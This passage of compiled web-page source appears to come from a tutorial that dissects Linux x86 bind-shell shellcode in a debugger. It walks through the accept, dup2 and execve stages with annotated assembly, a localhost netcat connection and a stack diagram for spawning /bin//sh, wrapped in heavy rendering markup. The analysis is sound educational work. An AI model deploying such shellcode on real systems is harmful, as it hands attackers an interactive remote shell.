parentName: \"a\"\n  }, {\n    \"className\": \"gatsby-resp-image-background-image\",\n    \"style\": {\n      \"paddingBottom\": \"70.94594594594594%\",\n      \"position\": \"relative\",\n      \"bottom\": \"0\",\n      \"left\": \"0\",\n      \"backgroundImage\": \"url('data:image/png;base64,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')\",\n      \"backgroundSize\": \"cover\",\n      \"display\": \"block\"\n    }\n  })), \"\\n  \", mdx(\"img\", _extends({\n    parentName: \"a\"\n  }, {\n    \"className\": \"gatsby-resp-image-image\",\n    
\"alt\": \"sys_accept\",\n    \"title\": \"sys_accept\",\n    \"src\": \"/static/4cc43a25ce535d2d227d21c863ce0cb1/fcda8/2020-06-17_22-02.png\",\n    \"srcSet\": [\"/static/4cc43a25ce535d2d227d21c863ce0cb1/12f09/2020-06-17_22-02.png 148w\", \"/static/4cc43a25ce535d2d227d21c863ce0cb1/e4a3f/2020-06-17_22-02.png 295w\", \"/static/4cc43a25ce535d2d227d21c863ce0cb1/fcda8/2020-06-17_22-02.png 590w\", \"/static/4cc43a25ce535d2d227d21c863ce0cb1/efc66/2020-06-17_22-02.png 885w\", \"/static/4cc43a25ce535d2d227d21c863ce0cb1/d9199/2020-06-17_22-02.png 960w\"],\n    \"sizes\": \"(max-width: 590px) 100vw, 590px\",\n    \"style\": {\n      \"width\": \"100%\",\n      \"height\": \"100%\",\n      \"margin\": \"0\",\n      \"verticalAlign\": \"middle\",\n      \"position\": \"absolute\",\n      \"top\": \"0\",\n      \"left\": \"0\"\n    },\n    \"loading\": \"lazy\"\n  })), \"\\n  \"), \"\\n    \")), mdx(\"p\", null, \"Hit \", mdx(\"kbd\", null, \"Enter\"), \" or \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"stepi\"), \" to step into system interrupt instruction, program will block and waiting for connection.\"), mdx(\"p\", null, \"Open another terminal, use netcat to establish a connection:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"shell\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-shell\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-shell\"\n  }), \"$ \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token function\"\n  }), \"nc\"), \" -v \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"127.0\"), \".0.1 \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"4444\")))), mdx(\"p\", null, \"In my case, the return value is 4 which 
represents the newly created socket file descriptor.\"), mdx(\"h3\", null, \"Dup2() system call\"), mdx(\"p\", null, \"Assembly snippet 5:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"assembly\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-assembly\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-assembly\"\n  }), \"0x0804a070 <+48>:   xchg   ebx,eax ; swap eax and ebx; ebx now holds the new file descriptor returned by accept\\n0x0804a071 <+49>:   pop    ecx     ; pop the old (listening) socket descriptor (0x3 in this run) off the stack into ecx\\n0x0804a072 <+50>:   push   0x3f    ; push 0x3f (63, the dup2 syscall number) onto the stack\\n0x0804a074 <+52>:   pop    eax     ; pop it into eax\\n0x0804a075 <+53>:   int    0x80    ; invoke dup2(oldfd = ebx, newfd = ecx)\\n\\n0x0804a077 <+55>:   dec    ecx                ; decrement ecx\\n0x0804a078 <+56>:   jns    0x804a072 <buf+50> ; jump back while the sign flag is clear (SF = 0), i.e. while ecx is still >= 0, so dup2 runs for newfd 3, 2, 1, 0\"))), mdx(\"p\", null, \"Register \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"EAX\"), \" now holds 0x3f (63), the number of syscall \", mdx(\"strong\", {\n    parentName: \"p\"\n  }, mdx(\"a\", _extends({\n    parentName: \"strong\"\n  }, {\n    \"href\": \"https://manpages.ubuntu.com/manpages/xenial/en/man2/dup2.2.html\"\n  }), \"dup2\")), \", so this time the program is about to invoke the dup2 syscall.\"), mdx(\"p\", null, \"Definition:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"c\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-c\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-c\"\n  }), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token keyword\"\n  }), \"int\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token function\"\n  }), \"dup2\"), 
mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"(\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token keyword\"\n  }), \"int\"), \" oldfd\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \",\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token keyword\"\n  }), \"int\"), \" newfd\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \")\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \";\")))), mdx(\"p\", null, \"Possible return value:\"), mdx(\"blockquote\", null, mdx(\"p\", {\n    parentName: \"blockquote\"\n  }, \"On success, these system calls return the new descriptor. On error, -1 is returned, and errno is set appropriately.\")), mdx(\"p\", null, \"What \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"dup2\"), \" basically do is to create a copy of the old file descriptor \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"oldfd\"), \" using new file descriptor \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"newfd\"), \". 
After a successful return, the old and new file descriptors may be used interchangeably, refer to the same open file description, and thus share file offset and file status flags.\"), mdx(\"p\", null, \"Register \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"EBX\"), \" holds previous newly create file descriptor, however, in this case, it represents \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"oldfd\"), \" argument from dup2 function, while register \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"ECX\"), \" holds old file descriptor and represents \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"newfd\"), \" argument.\"), mdx(\"p\", null, \"Before step in:\"), mdx(\"p\", null, mdx(\"span\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"gatsby-resp-image-wrapper\",\n    \"style\": {\n      \"position\": \"relative\",\n      \"display\": \"block\",\n      \"marginLeft\": \"auto\",\n      \"marginRight\": \"auto\",\n      \"maxWidth\": \"590px\"\n    }\n  }), \"\\n      \", mdx(\"a\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"gatsby-resp-image-link\",\n    \"href\": \"/static/31037dee688611bae42bc946d67afb56/d9199/2020-06-17_22-35.png\",\n    \"style\": {\n      \"display\": \"block\"\n    },\n    \"target\": \"_blank\",\n    \"rel\": \"noopener\"\n  }), \"\\n    \", mdx(\"span\", _extends({\n    parentName: \"a\"\n  }, {\n    \"className\": \"gatsby-resp-image-background-image\",\n    \"style\": {\n      \"paddingBottom\": \"68.91891891891892%\",\n      \"position\": \"relative\",\n      \"bottom\": \"0\",\n      \"left\": \"0\",\n      \"backgroundImage\": \"url('data:image/png;base64,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')\",\n      \"backgroundSize\": \"cover\",\n      
\"display\": \"block\"\n    }\n  })), \"\\n  \", mdx(\"img\", _extends({\n    parentName: \"a\"\n  }, {\n    \"className\": \"gatsby-resp-image-image\",\n    \"alt\": \"sys_dup2\",\n    \"title\": \"sys_dup2\",\n    \"src\": \"/static/31037dee688611bae42bc946d67afb56/fcda8/2020-06-17_22-35.png\",\n    \"srcSet\": [\"/static/31037dee688611bae42bc946d67afb56/12f09/2020-06-17_22-35.png 148w\", \"/static/31037dee688611bae42bc946d67afb56/e4a3f/2020-06-17_22-35.png 295w\", \"/static/31037dee688611bae42bc946d67afb56/fcda8/2020-06-17_22-35.png 590w\", \"/static/31037dee688611bae42bc946d67afb56/efc66/2020-06-17_22-35.png 885w\", \"/static/31037dee688611bae42bc946d67afb56/d9199/2020-06-17_22-35.png 960w\"],\n    \"sizes\": \"(max-width: 590px) 100vw, 590px\",\n    \"style\": {\n      \"width\": \"100%\",\n      \"height\": \"100%\",\n      \"margin\": \"0\",\n      \"verticalAlign\": \"middle\",\n      \"position\": \"absolute\",\n      \"top\": \"0\",\n      \"left\": \"0\"\n    },\n    \"loading\": \"lazy\"\n  })), \"\\n  \"), \"\\n    \")), mdx(\"p\", null, \"After stepping in, register \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"EAX\"), \" changes to 3, which represents the new file descriptor. The last two instructions form a loop that invokes the dup2 function three times, each time with the decremented value of register \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"ECX\"), \", namely \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"2 \u2014\u25B8 1 \u2014\u25B8 0\"), \", until register \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"ECX\"), \" ends up at \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"0xffffffff\"), \"; the sign flag is then set, hence the loop is complete. 
Finally, proceed to the next instruction to snippet 6.\"), mdx(\"p\", null, \"In short, above loop translate to C code is:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"c\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-c\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-c\"\n  }), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token function\"\n  }), \"dup2\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"(\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"4\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \",\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"2\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \")\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \";\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token comment\"\n  }), \"// 2 - standard error\"), \"\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token function\"\n  }), \"dup2\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"(\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"4\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \",\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"1\"), mdx(\"span\", _extends({\n    parentName: 
\"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \")\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \";\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token comment\"\n  }), \"// 1 - standard output\"), \"\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token function\"\n  }), \"dup2\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"(\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"4\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \",\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"0\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \")\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \";\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token comment\"\n  }), \"// 0 - standard input\")))), mdx(\"p\", null, \"Its purpose is to redirect \", mdx(\"strong\", {\n    parentName: \"p\"\n  }, \"stderr\"), \", \", mdx(\"strong\", {\n    parentName: \"p\"\n  }, \"stdout\"), \", \", mdx(\"strong\", {\n    parentName: \"p\"\n  }, \"stdin\"), \" to socket file descriptor in order to construct an interactive interface for this socket connection.\"), mdx(\"h3\", null, \"Execve() system call\"), mdx(\"p\", null, \"Assembly snippet 6:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"assembly\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-assembly\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    
\"className\": \"language-assembly\"\n  }), \"0x0804a07a <+58>:   push   0x68732f2f ; stands for `//sh` in little endian format\\n0x0804a07f <+63>:   push   0x6e69622f ; stands for `/bin` in little endian format\\n0x0804a084 <+68>:   mov    ebx,esp    ; save stack pointer esp to ebx, ebx now points to `/bin//sh`\\n0x0804a086 <+70>:   push   eax        ; push 0x0 onto stack\\n0x0804a087 <+71>:   push   ebx        ; push address of `/bin//sh` (ebx) onto stack\\n0x0804a088 <+72>:   mov    ecx,esp    ; save stack pointer esp to ecx\\n0x0804a08a <+74>:   mov    al,0xb     ; move 0xb (11) into al (low byte of eax); 11 is the syscall number of execve\\n0x0804a08c <+76>:   int    0x80\\n0x0804a08e <+78>:   add    BYTE PTR [eax],al ; opcode 00 00: likely null bytes following the payload, disassembled as an instruction\"))), mdx(\"p\", null, \"Use the Python 3 interpreter to derive \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"0x68732f2f\"), \", \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"0x6e69622f\"), \":\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"python\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-python\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-python\"\n  }), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \">>\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \">\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token string\"\n  }), \"'//sh'\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"[\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \":\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \":\"), mdx(\"span\", 
_extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \"-\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"1\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"]\"), \"\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token string\"\n  }), \"'hs//'\"), \"\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \">>\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \">\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token string\"\n  }), \"'hs//'\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \".\"), \"encode\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"(\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \")\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \".\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token builtin\"\n  }), \"hex\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"(\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \")\"), \"\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token string\"\n  }), \"'68732f2f'\"), \" \\u2014\\u25B8 \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"0x68732f2f\"), \"\\n\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": 
\"token operator\"\n  }), \">>\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \">\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token string\"\n  }), \"'/bin'\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"[\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \":\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \":\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \"-\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"1\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"]\"), \"\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token string\"\n  }), \"'nib/'\"), \"\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \">>\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \">\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token string\"\n  }), \"'nib/'\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \".\"), \"encode\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"(\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \")\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \".\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": 
\"token builtin\"\n  }), \"hex\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"(\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \")\"), \"\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token string\"\n  }), \"'6e69622f'\"), \" \u2014\u25B8 \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"0x6e69622f\")))), mdx(\"p\", null, \"Now we know the program is intended to launch another program, \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"/bin//sh\"), \". Before the system interrupt, register \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"EAX\"), \"\u2019s content changes to \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"0xb\"), \", which is decimal 11, so \", mdx(\"a\", _extends({\n    parentName: \"p\"\n  }, {\n    \"href\": \"https://manpages.ubuntu.com/manpages/xenial/en/man2/execve.2.html\"\n  }), \"execve\"), \" is called.\"), mdx(\"p\", null, \"Synopsis:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"c\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-c\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-c\"\n  }), \"       \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token macro property\"\n  }), \"#\", mdx(\"span\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"token directive keyword\"\n  }), \"include\"), \" \", mdx(\"span\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"token string\"\n  }), \"<unistd.h>\")), \"\\n\\n       \", mdx(\"span\", 
_extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token keyword\"\n  }), \"int\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token function\"\n  }), \"execve\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"(\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token keyword\"\n  }), \"const\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token keyword\"\n  }), \"char\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \"*\"), \"filename\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \",\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token keyword\"\n  }), \"char\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \"*\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token keyword\"\n  }), \"const\"), \" argv\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"[\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"]\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \",\"), \"\\n                  \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token keyword\"\n  }), \"char\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \"*\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token keyword\"\n  }), \"const\"), \" envp\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    
\"className\": \"token punctuation\"\n  }), \"[\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"]\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \")\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \";\")))), mdx(\"p\", null, \"Possible return value:\"), mdx(\"blockquote\", null, mdx(\"p\", {\n    parentName: \"blockquote\"\n  }, \"On success, \", mdx(\"strong\", {\n    parentName: \"p\"\n  }, mdx(\"a\", _extends({\n    parentName: \"strong\"\n  }, {\n    \"href\": \"https://manpages.ubuntu.com/manpages/xenial/en/man2/execve.2.html\"\n  }), \"execve()\")), \" does not return, on error -1 is returned, and errno is set appropriately.\")), mdx(\"p\", null, \"Stack layout:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"assembly\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-assembly\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-assembly\"\n  }), \"               Address      Stack\\n                        +------------+\\n                ....    |    ....    
|\\n                        +------------+\\nesp (ecx) \\u2014\\u25B8 0xbfffef48 | 0xbfffef50 | \\u25C2\\u2014 second argument represent address of address of \\\"/bin//sh\\\"\\n                        +------------+\\n             0xbfffef4c | 0x00000000 |\\n                        +------------+\\n    (ebx) \\u2014\\u25B8 0xbfffef50 | 0x6e69622f | \\u25C2\\u2014 \\\"/bin\\\" = \\\"/bin//sh\\\" \\u25C2\\u2014 first argument here which is *filename\\n                        +------------+     +\\n             0xbfffef54 | 0x68732f2f | \\u25C2\\u2014 \\\"//sh\\\"\\n                        +------------+\\n             0xbfffef58 | 0x00000000 |\\n                        +------------+\\n                ....    |    ....    |\\n                        +------------+\"))), mdx(\"p\", null, \"Before execute syscall:\"), mdx(\"p\", null, mdx(\"span\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"gatsby-resp-image-wrapper\",\n    \"style\": {\n      \"position\": \"relative\",\n      \"display\": \"block\",\n      \"marginLeft\": \"auto\",\n      \"marginRight\": \"auto\",\n      \"maxWidth\": \"590px\"\n    }\n  }), \"\\n      \", mdx(\"a\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"gatsby-resp-image-link\",\n    \"href\": \"/static/e052575c1e074157f13fc8b43c94648f/d9199/2020-06-17_23-51.png\",\n    \"style\": {\n      \"display\": \"block\"\n    },\n    \"target\": \"_blank\",\n    \"rel\": \"noopener\"\n  }), \"\\n    \", mdx(\"span\", _extends({\n    parentName: \"a\"\n  }, {\n    \"className\": \"gatsby-resp-image-background-image\",\n    \"style\": {\n      \"paddingBottom\": \"68.91891891891892%\",\n      \"position\": \"relative\",\n      \"bottom\": \"0\",\n      \"left\": \"0\",\n      \"backgroundImage\": 
\"url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAA7EAAAOxAGVKw4bAAADEUlEQVQ4y32SXW/iRhSGfVMl/uCjoWlM1gZ/G2ObsTEQDA4hwIYkm2hFkkZqpZWWi/ZHxDdV/lHLZaX+rXY1aN7KJFIr7XYvHp3RjObRe3QON3VG6dRInwc17alzEOZhqZ2ffKPmpOzlmZrkU/0kn9mjPJSs3BeMPBDMPCiqaOW+5OS+uLt/CgTj2eO1B+4ymD2vwhnmDRunchuT4wQzJcawFuLkgCCtEQwqARKpha7o7ogFB91SG0m1g6Tsoyu1MCj5CATzT+42WT49dud4p+h/TQ80Ov3OpgvZoKdVm2ZVj46/D2gk6jSSXJqUPNqveDQ9DGmv7FKyb9CINynhzb+7gg1/X/uNez+4zh+jGa5lhc5rGnt7FLDTss5SUWdj0Wajms96VZt1yy3WK7dZr9Ji6WHIkrLLCG+wiDcZ4U3aFRz4vLbh5t5ZfmUMcC036EXdZW9lD7Omg2HdQ6ZmmDZTZPUESaWNjmCBiDY6fFEdRJUAUalVnGkiefAFc8OFopk/Jrf4Mb2j78MLNlVSDGUFA5UgrvfREW0Q3gQRLESfYe8qESya7BLqGy6u2fl9f4HHbElvyJidN2NkagMjNcFEO8dActDljZePvImokH/Oq1ArhFY+PHKxGs7oLWmxK0fFVPVwaRJcGxHGZQczmaBf9V6EX0hKhP8IScnOV8ESP41X9FwdsH7Fx0hW0a+H6OkZhtoYw8YQccUD2S+Sfjnh65Q3XLGwd/EV7pJL2hEsFuw5GCka+kqMnj3HyJpgbJ4i/tYH4S1Eov0vkotIdIpB0UR04QvGhlv6ZzvhwsxoVo/YQmuyC0NnZ42ILQyfZXWPpUcxy46T3eoQwWaR+ErJY5HosBdh60X4MLp5+pCtkMnxp65kbO/D+vYhbGwvzOF2aY23ieRsyb6xjXjzfyG8+em15d+5+/Tdrx9GK/TKHhLJwkOo4IewiRtviit7guFBgFiw0f0KxXu/aJnX/uAmziDI9ORnV2h+dPk364l+uJ7o8vpECdY92V/7ZX1t771Z23vK1/jo7Cm/mHvH838AJYl0/OjJ5UIAAAAASUVORK5CYII=')\",\n      \"backgroundSize\": \"cover\",\n      \"display\": \"block\"\n    }\n  })), \"\\n  \", mdx(\"img\", _extends({\n    parentName: \"a\"\n  }, {\n    \"className\": \"gatsby-resp-image-image\",\n 